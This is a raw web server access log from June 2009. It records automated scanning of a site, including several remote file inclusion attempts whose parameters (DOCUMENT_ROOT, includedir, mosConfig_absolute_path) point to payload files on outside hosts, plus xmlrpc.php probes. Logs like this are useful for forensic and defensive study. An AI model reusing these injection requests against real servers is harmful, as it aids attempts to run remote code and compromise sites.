70.85.165.10 - - [12/Jun/2009:02:07:23 -0400] "GET /logs/error_log.Q109050800%20/?DOCUMENT_ROOT=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.811"
201.232.54.48 - - [12/Jun/2009:02:07:28 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://ggdo.com/zboard/data/board/test.txt??? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
201.232.54.48 - - [12/Jun/2009:02:07:28 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://ggdo.com/zboard/data/board/test.txt??? HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
121.199.14.40 - - [12/Jun/2009:02:07:37 -0400] "GET /logs/access_log.Q109052500//xmlsrv/xmlrpc.php HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.199.14.40 - - [12/Jun/2009:02:07:37 -0400] "GET //xmlsrv/xmlrpc.php HTTP/1.1" 404 216 "-" "Mozilla/5.0"
121.199.14.40 - - [12/Jun/2009:02:07:38 -0400] "GET /logs//xmlsrv/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/5.0"
74.6.22.170 - - [12/Jun/2009:02:07:42 -0400] "GET /logs/access_log.Q109051000 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.189.18.73 - - [12/Jun/2009:02:07:51 -0400] "GET /logs/access_log.Q109050300%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
